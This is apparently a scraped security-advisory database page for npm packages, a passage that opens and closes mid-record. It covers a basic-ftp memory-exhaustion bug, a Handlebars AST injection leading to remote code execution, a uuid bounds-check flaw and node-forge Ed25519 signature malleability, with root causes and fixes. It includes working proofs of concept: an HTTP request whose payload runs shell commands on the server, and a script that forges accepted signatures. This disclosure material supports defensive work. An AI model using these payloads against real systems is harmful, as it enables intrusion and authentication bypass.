"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-16T21:37:48Z",
"nvd_published_at": "2026-04-24T04:16:20Z",
"severity": "HIGH"
},
"details": "### Summary\n`basic-ftp@5.2.2` is vulnerable to denial of service through unbounded memory growth while processing directory listings from a remote FTP server. A malicious or compromised server can send an extremely large or never-ending listing response to `Client.list()`, causing the client process to consume memory until it becomes unstable or crashes.\n\n### Details\nThe issue is in the package\u0027s default directory listing flow.\n\n`Client.list()` reaches `dist/Client.js`, where the full listing response is downloaded into a `StringWriter` before parsing:\n\nFile: `dist/Client.js:516-527`\n\n```js\nasync _requestListWithCommand(command) {\n const buffer = new StringWriter_1.StringWriter();\n await (0, transfer_1.downloadTo)(buffer, {\n ftp: this.ftp,\n tracker: this._progressTracker,\n command,\n remotePath: \"\",\n type: \"list\"\n });\n const text = buffer.getText(this.ftp.encoding);\n this.ftp.log(text);\n return this.parseList(text);\n}\n```\n\nThe vulnerable sink is `StringWriter`, which grows an in-memory `Buffer` with no limit:\n\nFile: `dist/StringWriter.js:5-20`\n\n```js\nclass StringWriter extends stream_1.Writable {\n constructor() {\n super(...arguments);\n this.buf = Buffer.alloc(0);\n }\n _write(chunk, _, callback) {\n if (chunk instanceof Buffer) {\n this.buf = Buffer.concat([this.buf, chunk]);\n callback(null);\n }\n else {\n callback(new Error(\"StringWriter expects chunks of type \u0027Buffer\u0027.\"));\n }\n }\n getText(encoding) {\n return this.buf.toString(encoding);\n }\n}\n```\n\nThe critical operation is:\n\n```js\nthis.buf = Buffer.concat([this.buf, chunk]);\n```\n\nThere is no maximum size check, no truncation, and no streaming parser. Because the remote FTP server controls the listing response, it can force the client to keep allocating memory until the process is terminated.\n\nHow it happens:\n\n1. An application connects to an attacker-controlled or compromised FTP server.\n2. The application calls `client.list()`.\n3. The server returns an extremely large or unbounded directory listing.\n4. `basic-ftp` buffers the full response in `StringWriter`.\n5. Memory grows without bound due to repeated `Buffer.concat(...)` calls.\n\n### PoC\nThe following PoC exercises the vulnerable buffering primitive directly:\n\n```js\nconst { StringWriter } = require(\"basic-ftp/dist/StringWriter.js\");\n\nfunction mb(n) {\n return Math.round(n / 1024 / 1024) + \"MB\";\n}\n\nconst writer = new StringWriter();\nlet wrote = 0;\n\nfor (let i = 0; i \u003c 32; i++) {\n const chunk = Buffer.alloc(4 * 1024 * 1024, 0x41);\n writer.write(chunk);\n wrote += chunk.length;\n\n if ((i + 1) % 8 === 0) {\n const m = process.memoryUsage();\n console.log(\"written\", mb(wrote), \"rss\", mb(m.rss), \"heap\", mb(m.heapUsed), \"buf\", mb(m.arrayBuffers));\n }\n}\n\nconsole.log(\"final text len\", writer.getText(\"utf8\").length);\n```\n\nObserved output:\n\n```text\nwritten 32MB rss 116MB heap 4MB buf 64MB\nwritten 64MB rss 296MB heap 4MB buf 240MB\nwritten 96MB rss 340MB heap 3MB buf 284MB\nwritten 128MB rss 436MB heap 3MB buf 376MB\nfinal text len 134217728\n```\n\nThis demonstrates sustained memory growth in the same code path used to buffer directory listing data.\n\nSupporting files saved alongside this report:\n\n- `poc.js`\n- `poc_output.txt`\n\n### Impact\nThis is a denial-of-service vulnerability affecting applications that use `basic-ftp` to list directories from remote FTP servers.\n\n- Vulnerability class: Memory exhaustion / Denial of Service\n- Attack precondition: The victim connects to a malicious or compromised FTP server and performs `Client.list()`\n- Impacted users: Any application or service using `basic-ftp@5.2.2` against untrusted FTP endpoints\n- Security effect: The attacker can cause excessive memory consumption, process instability, and potential process termination\n\nRecommended remediation:\n\n1. Enforce a maximum listing size.\n2. Abort transfers that exceed the configured limit.\n3. Prefer incremental or streaming parsing over full-response buffering.\n\nExample defensive check:\n\n```js\nif (this.buf.length + chunk.length \u003e MAX_LISTING_BYTES) {\n callback(new Error(\"FTP listing exceeds maximum allowed size.\"));\n return;\n}\nthis.buf = Buffer.concat([this.buf, chunk]);\n```",
"id": "GHSA-rp42-5vxx-qpwr",
"modified": "2026-04-24T21:02:13Z",
"published": "2026-04-16T21:37:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-rp42-5vxx-qpwr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41324"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickjuchli/basic-ftp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()"
}
GHSA-2W6W-674Q-4C4Q
Vulnerability from github – Published: 2026-03-27 18:19 – Updated: 2026-03-27 21:52Summary
Handlebars.compile() accepts a pre-parsed AST object in addition to a template string. The value field of a NumberLiteral AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to compile() can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server.
Description
Handlebars.compile() accepts either a template string or a pre-parsed AST. When an AST is supplied, the JavaScript code generator in lib/handlebars/compiler/javascript-compiler.js emits NumberLiteral values verbatim:
// Simplified representation of the vulnerable code path:
// NumberLiteral.value is appended to the generated code without escaping
compiledCode += numberLiteralNode.value;
Because the value is not wrapped in quotes or otherwise sanitized, passing a string such as {},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() // as the value of a NumberLiteral causes the generated eval-ed code to break out of its intended context and execute arbitrary commands.
Any endpoint that deserializes user-controlled JSON and passes the result directly to Handlebars.compile() is exploitable.
Proof of Concept
Server-side Express application that passes req.body.text to Handlebars.compile():
import express from "express";
import Handlebars from "handlebars";
const app = express();
app.use(express.json());
app.post("/api/render", (req, res) => {
let text = req.body.text;
let template = Handlebars.compile(text);
let result = template();
res.send(result);
});
app.listen(2123);
POST /api/render HTTP/1.1
Content-Type: application/json
Host: 127.0.0.1:2123
{
"text": {
"type": "Program",
"body": [
{
"type": "MustacheStatement",
"path": {
"type": "PathExpression",
"data": false,
"depth": 0,
"parts": ["lookup"],
"original": "lookup",
"loc": null
},
"params": [
{
"type": "PathExpression",
"data": false,
"depth": 0,
"parts": [],
"original": "this",
"loc": null
},
{
"type": "NumberLiteral",
"value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
"original": 1,
"loc": null
}
],
"escaped": true,
"strip": { "open": false, "close": false },
"loc": null
}
]
}
}
The response body will contain the output of the id command executed on the server.
Workarounds
- Validate input type before calling
Handlebars.compile(): ensure the argument is always astring, never a plain object or JSON-deserialized value.javascript if (typeof templateInput !== 'string') { throw new TypeError('Template must be a string'); } - Use the Handlebars runtime-only build (
handlebars/runtime) on the server if templates are pre-compiled at build time;compile()will be unavailable.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.7.8"
},
"package": {
"ecosystem": "npm",
"name": "handlebars"
},
"ranges": [
{
"events": [
{
"introduced": "4.0.0"
},
{
"fixed": "4.7.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33937"
],
"database_specific": {
"cwe_ids": [
"CWE-843",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-27T18:19:58Z",
"nvd_published_at": "2026-03-27T21:17:27Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\n`Handlebars.compile()` accepts a pre-parsed AST object in addition to a template string. The `value` field of a `NumberLiteral` AST node is emitted directly into the generated JavaScript without quoting or sanitization. An attacker who can supply a crafted AST to `compile()` can therefore inject and execute arbitrary JavaScript, leading to Remote Code Execution on the server.\n\n## Description\n\n`Handlebars.compile()` accepts either a template string or a pre-parsed AST. When an AST is supplied, the JavaScript code generator in `lib/handlebars/compiler/javascript-compiler.js` emits `NumberLiteral` values verbatim:\n\n```javascript\n// Simplified representation of the vulnerable code path:\n// NumberLiteral.value is appended to the generated code without escaping\ncompiledCode += numberLiteralNode.value;\n```\n\nBecause the value is not wrapped in quotes or otherwise sanitized, passing a string such as `{},{})) + process.getBuiltinModule(\u0027child_process\u0027).execFileSync(\u0027id\u0027).toString() //` as the `value` of a `NumberLiteral` causes the generated `eval`-ed code to break out of its intended context and execute arbitrary commands.\n\nAny endpoint that deserializes user-controlled JSON and passes the result directly to `Handlebars.compile()` is exploitable.\n\n## Proof of Concept\n\nServer-side Express application that passes `req.body.text` to `Handlebars.compile()`:\n\n\n```Javascript\nimport express from \"express\";\nimport Handlebars from \"handlebars\";\n\nconst app = express();\napp.use(express.json());\n\napp.post(\"/api/render\", (req, res) =\u003e {\n let text = req.body.text;\n let template = Handlebars.compile(text);\n let result = template();\n res.send(result);\n});\n\napp.listen(2123);\n```\n\n```\nPOST /api/render HTTP/1.1\nContent-Type: application/json\nHost: 127.0.0.1:2123\n\n{\n \"text\": {\n \"type\": \"Program\",\n \"body\": [\n {\n \"type\": \"MustacheStatement\",\n \"path\": {\n \"type\": \"PathExpression\",\n \"data\": false,\n \"depth\": 0,\n \"parts\": [\"lookup\"],\n \"original\": \"lookup\",\n \"loc\": null\n },\n \"params\": [\n {\n \"type\": \"PathExpression\",\n \"data\": false,\n \"depth\": 0,\n \"parts\": [],\n \"original\": \"this\",\n \"loc\": null\n },\n {\n \"type\": \"NumberLiteral\",\n \"value\": \"{},{})) + process.getBuiltinModule(\u0027child_process\u0027).execFileSync(\u0027id\u0027).toString() //\",\n \"original\": 1,\n \"loc\": null\n }\n ],\n \"escaped\": true,\n \"strip\": { \"open\": false, \"close\": false },\n \"loc\": null\n }\n ]\n }\n}\n```\n\nThe response body will contain the output of the `id` command executed on the server.\n\n## Workarounds\n\n- **Validate input type** before calling `Handlebars.compile()`: ensure the argument is always a `string`, never a plain object or JSON-deserialized value.\n ```javascript\n if (typeof templateInput !== \u0027string\u0027) {\n throw new TypeError(\u0027Template must be a string\u0027);\n }\n ```\n- Use the Handlebars **runtime-only** build (`handlebars/runtime`) on the server if templates are pre-compiled at build time; `compile()` will be unavailable.",
"id": "GHSA-2w6w-674q-4c4q",
"modified": "2026-03-27T21:52:17Z",
"published": "2026-03-27T18:19:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/handlebars-lang/handlebars.js/security/advisories/GHSA-2w6w-674q-4c4q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://github.com/handlebars-lang/handlebars.js/commit/68d8df5a88e0a26fe9e6084c5c6aaebe67b07da2"
},
{
"type": "PACKAGE",
"url": "https://github.com/handlebars-lang/handlebars.js"
},
{
"type": "WEB",
"url": "https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.7.9"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Handlebars.js has JavaScript Injection via AST Type Confusion"
}
GHSA-W5HQ-G745-H8PQ
Vulnerability from github – Published: 2026-04-22 20:53 – Updated: 2026-05-21 18:25Summary
The v3(), v5(), and v6() API methods (not uuid release versions) accept external output buffers but do not reject out-of-range writes (small buf or large offset).
By contrast, v4(), v1(), and v7() API methods explicitly throw RangeError on invalid bounds.
This inconsistency allows silent partial writes into caller-provided buffers.
Affected code
src/v35.ts(v3()/v5()path) writesbuf[offset + i]without bounds validation.src/v6.tswritesbuf[offset + i]without bounds validation.
Reproducible PoC
cd /home/StrawHat/uuid
npm ci
npm run build
node --input-type=module -e "
import {v4,v5,v6} from './dist-node/index.js';
const ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';
for (const [name,fn] of [
['v4()',()=>v4({},new Uint8Array(8),4)],
['v5()',()=>v5('x',ns,new Uint8Array(8),4)],
['v6()',()=>v6({},new Uint8Array(8),4)],
]) {
try { fn(); console.log(name,'NO_THROW'); }
catch(e){ console.log(name,'THREW',e.name); }
}"
Observed:
v4() THREW RangeErrorv5() NO_THROWv6() NO_THROW
Example partial overwrite evidence captured during audit:
same true buf [
170, 170, 170, 170,
75, 224, 100, 63
]
v6 [
187, 187, 187, 187,
31, 19, 185, 64
]
Security impact
- Primary: integrity/robustness issue (silent partial output).
- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.
- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.
Suggested fix
Add the same guard used by v4()/v1()/v7():
if (offset < 0 || offset + 16 > buf.length) {
throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);
}
Apply to:
src/v35.ts(coversv3()andv5())src/v6.ts
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "uuid"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.1.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "uuid"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "uuid"
},
"ranges": [
{
"events": [
{
"introduced": "13.0.0"
},
{
"fixed": "13.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41907"
],
"database_specific": {
"cwe_ids": [
"CWE-1285",
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T20:53:24Z",
"nvd_published_at": "2026-04-24T19:17:14Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nThe `v3()`, `v5()`, and `v6()` [API methods](https://github.com/uuidjs/uuid#api-summary) (not `uuid` release versions) accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4()`, `v1()`, and `v7()` API methods explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3()`/`v5()` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from \u0027./dist-node/index.js\u0027;\nconst ns=\u00276ba7b810-9dad-11d1-80b4-00c04fd430c8\u0027;\nfor (const [name,fn] of [\n [\u0027v4()\u0027,()=\u003ev4({},new Uint8Array(8),4)],\n [\u0027v5()\u0027,()=\u003ev5(\u0027x\u0027,ns,new Uint8Array(8),4)],\n [\u0027v6()\u0027,()=\u003ev6({},new Uint8Array(8),4)],\n]) {\n try { fn(); console.log(name,\u0027NO_THROW\u0027); }\n catch(e){ console.log(name,\u0027THREW\u0027,e.name); }\n}\"\n```\n\nObserved:\n\n- `v4() THREW RangeError`\n- `v5() NO_THROW`\n- `v6() NO_THROW`\n\nExample partial overwrite evidence captured during audit:\n\n```text\nsame true buf [\n 170, 170, 170, 170,\n 75, 224, 100, 63\n]\nv6 [\n 187, 187, 187, 187,\n 31, 19, 185, 64\n]\n```\n\n### Security impact\n\n- **Primary**: integrity/robustness issue (silent partial output).\n- If an application assumes full UUID writes into preallocated buffers, this can produce malformed/truncated/partially stale identifiers without error.\n- In systems where caller-controlled offsets/buffer sizes are exposed indirectly, this may become a security-relevant logic flaw.\n\n### Suggested fix\n\nAdd the same guard used by `v4()`/`v1()`/`v7()`:\n\n```ts\nif (offset \u003c 0 || offset + 16 \u003e buf.length) {\n throw new RangeError(`UUID byte range ${offset}:${offset + 15} is out of buffer bounds`);\n}\n```\n\nApply to:\n\n- `src/v35.ts` (covers `v3()` and `v5()`)\n- `src/v6.ts`",
"id": "GHSA-w5hq-g745-h8pq",
"modified": "2026-05-21T18:25:56Z",
"published": "2026-04-22T20:53:24Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41907"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/commit/32389c887c9e75f90442ee4cc95bbab0c4e8346e"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/commit/3d61d6ac1f782cf6b1dd8661c60f11722cd49a0d"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/commit/9d27ddf7046ce496ef39569ff84d948eeff9cb2a"
},
{
"type": "PACKAGE",
"url": "https://github.com/uuidjs/uuid"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/releases/tag/v11.1.1"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/releases/tag/v12.0.1"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/releases/tag/v13.0.1"
},
{
"type": "WEB",
"url": "https://github.com/uuidjs/uuid/releases/tag/v14.0.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided"
}
GHSA-Q67F-28XG-22RW
Vulnerability from github – Published: 2026-03-26 22:04 – Updated: 2026-03-27 21:51Summary
Ed25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (S >= L). A valid signature and its S + L variant both verify in forge, while Node.js crypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the specification. This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see CVE-2026-25793, CVE-2022-35961). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed.
Impacted Deployments
Tested commit: 8e1d527fe8ec2670499068db783172d4fb9012e5
Affected versions: tested on v1.3.3 (latest release) and all versions since Ed25519 was implemented.
Configuration assumptions:
- Default forge Ed25519 verify API path (ed25519.verify(...)).
Root Cause
In lib/ed25519.js, crypto_sign_open(...) uses the signature's last 32 bytes (S) directly in scalar multiplication:
scalarbase(q, sm.subarray(32));
There is no prior check enforcing S < L (Ed25519 group order). As a result, equivalent scalar classes can pass verification, including a modified signature where S := S + L (mod 2^256) when that value remains non-canonical. The PoC demonstrates this by mutating only the S half of a valid 64-byte signature.
Reproduction Steps
- Use Node.js (tested with
v24.9.0) and clonedigitalbazaar/forgeat commit8e1d527fe8ec2670499068db783172d4fb9012e5. - Place and run the PoC script (
poc.js) withnode poc.jsin the same level as theforgefolder. - The script generates an Ed25519 keypair via forge, signs a fixed message, mutates the signature by adding Ed25519 order L to S (bytes 32..63), and verifies both original and tweaked signatures with forge and Node/OpenSSL (
crypto.verify). - Confirm output includes:
{
"forge": {
"original_valid": true,
"tweaked_valid": true
},
"crypto": {
"original_valid": true,
"tweaked_valid": false
}
}
Proof of Concept
Overview: - Demonstrates a valid control signature and a forged (S + L) signature in one run. - Uses Node/OpenSSL as a differential verification baseline. - Observed output on tested commit:
{
"forge": {
"original_valid": true,
"tweaked_valid": true
},
"crypto": {
"original_valid": true,
"tweaked_valid": false
}
}
poc.js
#!/usr/bin/env node
'use strict';
const path = require('path');
const crypto = require('crypto');
const forge = require('./forge');
const ed = forge.ed25519;
const MESSAGE = Buffer.from('dderpym is the coolest man alive!');
// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).
const ED25519_ORDER_L = Buffer.from([
0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,
0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
]);
// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.
// This returns a new signature with s := s + L (mod 2^256), plus the carry.
function addLToS(signature) {
if (!Buffer.isBuffer(signature) || signature.length !== 64) {
throw new Error('signature must be a 64-byte Buffer');
}
const out = Buffer.from(signature);
let carry = 0;
for (let i = 0; i < 32; i++) {
const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.
const sum = out[idx] + ED25519_ORDER_L[i] + carry;
out[idx] = sum & 0xff;
carry = sum >> 8;
}
return { sig: out, carry };
}
function toSpkiPem(publicKeyBytes) {
if (publicKeyBytes.length !== 32) {
throw new Error('publicKeyBytes must be 32 bytes');
}
// Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.
const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);
const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);
const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);
const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);
const b64 = spki.toString('base64').match(/.{1,64}/g).join('\n');
return `-----BEGIN PUBLIC KEY-----\n${b64}\n-----END PUBLIC KEY-----\n`;
}
function verifyWithCrypto(publicKey, message, signature) {
try {
const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));
const ok = crypto.verify(null, message, keyObject, signature);
return { ok };
} catch (error) {
return { ok: false, error: error.message };
}
}
function toResult(label, original, tweaked) {
return {
[label]: {
original_valid: original.ok,
tweaked_valid: tweaked.ok,
},
};
}
function main() {
const kp = ed.generateKeyPair();
const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });
const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });
const tweaked = addLToS(sig);
const okTweaked = ed.verify({
message: MESSAGE,
signature: tweaked.sig,
publicKey: kp.publicKey,
});
const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);
const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);
const result = {
...toResult('forge', { ok }, { ok: okTweaked }),
...toResult('crypto', cryptoOriginal, cryptoTweaked),
};
console.log(JSON.stringify(result, null, 2));
}
main();
Suggested Patch
Add strict canonical scalar validation in Ed25519 verify path before scalar multiplication. (Parse S as little-endian 32-byte integer and reject if S >= L).
Here is a patch we tested on our end to resolve the issue, though please verify it on your end:
index f3e6faa..87eb709 100644
--- a/lib/ed25519.js
+++ b/lib/ed25519.js
@@ -380,6 +380,10 @@ function crypto_sign_open(m, sm, n, pk) {
return -1;
}
+ if(!_isCanonicalSignatureScalar(sm, 32)) {
+ return -1;
+ }
+
for(i = 0; i < n; ++i) {
m[i] = sm[i];
}
@@ -409,6 +413,21 @@ function crypto_sign_open(m, sm, n, pk) {
return mlen;
}
+function _isCanonicalSignatureScalar(bytes, offset) {
+ var i;
+ // Compare little-endian scalar S against group order L and require S < L.
+ for(i = 31; i >= 0; --i) {
+ if(bytes[offset + i] < L[i]) {
+ return true;
+ }
+ if(bytes[offset + i] > L[i]) {
+ return false;
+ }
+ }
+ // S == L is non-canonical.
+ return false;
+}
+
function modL(r, x) {
var carry, i, j, k;
for(i = 63; i >= 32; --i) {
Resources
- RFC 8032 (Ed25519): https://datatracker.ietf.org/doc/html/rfc8032#section-8.4
-
Ed25519 and Ed448 signatures are not malleable due to the verification check that decoded S is smaller than l
Credit
This vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33895"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T22:04:41Z",
"nvd_published_at": "2026-03-27T21:17:26Z",
"severity": "HIGH"
},
"details": "## Summary\nEd25519 signature verification accepts forged non-canonical signatures where the scalar S is not reduced modulo the group order (`S \u003e= L`). A valid signature and its `S + L` variant both verify in forge, while Node.js `crypto.verify` (OpenSSL-backed) rejects the `S + L` variant, [as defined by the specification](https://datatracker.ietf.org/doc/html/rfc8032#section-8.4). This class of signature malleability has been exploited in practice to bypass authentication and authorization logic (see [CVE-2026-25793](https://nvd.nist.gov/vuln/detail/CVE-2026-25793), [CVE-2022-35961](https://nvd.nist.gov/vuln/detail/CVE-2022-35961)). Applications relying on signature uniqueness (i.e., dedup by signature bytes, replay tracking, signed-object canonicalization checks) may be bypassed.\n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and all versions since Ed25519 was implemented.\n\n**Configuration assumptions:**\n- Default forge Ed25519 verify API path (`ed25519.verify(...)`).\n\n\n## Root Cause\nIn `lib/ed25519.js`, `crypto_sign_open(...)` uses the signature\u0027s last 32 bytes (`S`) directly in scalar multiplication:\n\n```javascript\nscalarbase(q, sm.subarray(32));\n```\n\nThere is no prior check enforcing `S \u003c L` (Ed25519 group order). As a result, equivalent scalar classes can pass verification, including a modified signature where `S := S + L (mod 2^256)` when that value remains non-canonical. The PoC demonstrates this by mutating only the S half of a valid 64-byte signature.\n\n## Reproduction Steps\n- Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n- Place and run the PoC script (`poc.js`) with `node poc.js` in the same level as the `forge` folder.\n- The script generates an Ed25519 keypair via forge, signs a fixed message, mutates the signature by adding Ed25519 order L to S (bytes 32..63), and verifies both original and tweaked signatures with forge and Node/OpenSSL (`crypto.verify`).\n- Confirm output includes:\n\n```json\n{\n\t\"forge\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": true\n\t},\n\t\"crypto\": {\n\t\t\"original_valid\": true,\n\t\t\"tweaked_valid\": false\n\t}\n}\n```\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged (S + L) signature in one run.\n- Uses Node/OpenSSL as a differential verification baseline.\n- Observed output on tested commit:\n\n```text\n{\n \"forge\": {\n \"original_valid\": true,\n \"tweaked_valid\": true\n },\n \"crypto\": {\n \"original_valid\": true,\n \"tweaked_valid\": false\n }\n}\n```\n\n\u003cdetails\u003e\u003csummary\u003epoc.js\u003c/summary\u003e\n\n```javascript\n#!/usr/bin/env node\n\u0027use strict\u0027;\n\nconst path = require(\u0027path\u0027);\nconst crypto = require(\u0027crypto\u0027);\nconst forge = require(\u0027./forge\u0027);\nconst ed = forge.ed25519;\n\nconst MESSAGE = Buffer.from(\u0027dderpym is the coolest man alive!\u0027);\n\n// Ed25519 group order L encoded as 32 bytes, little-endian (RFC 8032).\nconst ED25519_ORDER_L = Buffer.from([\n 0xed, 0xd3, 0xf5, 0x5c, 0x1a, 0x63, 0x12, 0x58,\n 0xd6, 0x9c, 0xf7, 0xa2, 0xde, 0xf9, 0xde, 0x14,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,\n]);\n\n// For Ed25519 signatures, s is the last 32 bytes of the 64-byte signature.\n// This returns a new signature with s := s + L (mod 2^256), plus the carry.\nfunction addLToS(signature) {\n if (!Buffer.isBuffer(signature) || signature.length !== 64) {\n throw new Error(\u0027signature must be a 64-byte Buffer\u0027);\n }\n const out = Buffer.from(signature);\n let carry = 0;\n for (let i = 0; i \u003c 32; i++) {\n const idx = 32 + i; // s starts at byte 32 in the 64-byte signature.\n const sum = out[idx] + ED25519_ORDER_L[i] + carry;\n out[idx] = sum \u0026 0xff;\n carry = sum \u003e\u003e 8;\n }\n return { sig: out, carry };\n}\n\nfunction toSpkiPem(publicKeyBytes) {\n if (publicKeyBytes.length !== 32) {\n throw new Error(\u0027publicKeyBytes must be 32 bytes\u0027);\n }\n // Builds an ASN.1 SubjectPublicKeyInfo for Ed25519 (RFC 8410) and returns PEM.\n const oidEd25519 = Buffer.from([0x06, 0x03, 0x2b, 0x65, 0x70]);\n const algId = Buffer.concat([Buffer.from([0x30, 0x05]), oidEd25519]);\n const bitString = Buffer.concat([Buffer.from([0x03, 0x21, 0x00]), publicKeyBytes]);\n const spki = Buffer.concat([Buffer.from([0x30, 0x2a]), algId, bitString]);\n const b64 = spki.toString(\u0027base64\u0027).match(/.{1,64}/g).join(\u0027\\n\u0027);\n return `-----BEGIN PUBLIC KEY-----\\n${b64}\\n-----END PUBLIC KEY-----\\n`;\n}\n\nfunction verifyWithCrypto(publicKey, message, signature) {\n try {\n const keyObject = crypto.createPublicKey(toSpkiPem(publicKey));\n const ok = crypto.verify(null, message, keyObject, signature);\n return { ok };\n } catch (error) {\n return { ok: false, error: error.message };\n }\n}\n\nfunction toResult(label, original, tweaked) {\n return {\n [label]: {\n original_valid: original.ok,\n tweaked_valid: tweaked.ok,\n },\n };\n}\n\nfunction main() {\n const kp = ed.generateKeyPair();\n const sig = ed.sign({ message: MESSAGE, privateKey: kp.privateKey });\n const ok = ed.verify({ message: MESSAGE, signature: sig, publicKey: kp.publicKey });\n const tweaked = addLToS(sig);\n const okTweaked = ed.verify({\n message: MESSAGE,\n signature: tweaked.sig,\n publicKey: kp.publicKey,\n });\n const cryptoOriginal = verifyWithCrypto(kp.publicKey, MESSAGE, sig);\n const cryptoTweaked = verifyWithCrypto(kp.publicKey, MESSAGE, tweaked.sig);\n const result = {\n ...toResult(\u0027forge\u0027, { ok }, { ok: okTweaked }),\n ...toResult(\u0027crypto\u0027, cryptoOriginal, cryptoTweaked),\n };\n 